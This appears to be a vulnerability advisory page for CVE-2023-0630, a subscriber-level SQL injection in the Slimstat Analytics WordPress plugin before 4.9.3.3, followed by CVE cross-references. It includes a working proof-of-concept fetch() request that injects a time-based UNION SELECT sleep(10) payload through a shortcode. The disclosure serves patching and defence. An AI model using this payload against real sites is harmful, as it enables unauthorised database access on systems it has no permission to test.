Lucene search
Marc MontpasWPVDB-ID:B82BDD02-B699-4527-86CC-D60B56AB0C55HistoryFeb 27, 2023 - 12:00 a.m.
Slimstat Analytics < 4.9.3.3 - Subscriber+ SQL Injection
2023-02-2700:00:00
Marc Montpas
wpscan.com
14
sql injection
subscriber
poc
wordpress
0.099 Low
EPSS
Percentile
94.9%
The plugin does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.
PoC
While logged in as a subscriber, send the following request: (await fetch(‘/wp-admin/admin-ajax.php’,{method:‘POST’, headers: {‘Content-Type’: ‘application/x-www-form-urlencoded’},body:‘action=parse-media-shortcode&shortcode;=[slimstat f=“count” w=“author”]WHERE:1 UNION SELECT sleep(10)-- a[/slimstat]’})).text() If successful, the request should hang for ~10 seconds, indicating we successfully injected something in the affected SQL query.
| CPE | Name | Operator | Version |
|---|---|---|---|
| wp-slimstat | lt | 4.9.3.3 |
Related
osv
osv
CVE-2023-0630
2023-03-20 16:15:12
cvelist
cvelist
CVE-2023-0630 Slimstat Analytics < 4.9.3.3 - Subscriber+ SQL Injection
2023-03-20 15:52:13
nvd
nvd
CVE-2023-0630
2023-03-20 16:15:12
prion
prion
Code injection
2023-03-20 16:15:00
nuclei
nuclei
Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection
2023-06-16 00:22:58
cve
cve
CVE-2023-0630
2023-03-20 16:15:12
openvas
openvas
WordPress Slimstat Analytics Plugin < 4.9.3.3 SQLi Vulnerability
2023-03-22 00:00:00
wpexploit
wpexploit
Slimstat Analytics < 4.9.3.3 - Subscriber+ SQL Injection
2023-02-27 00:00:00
githubexploit
githubexploit
Exploit for CVE-2023-0630
2023-06-09 12:02:55
wordfence
wordfence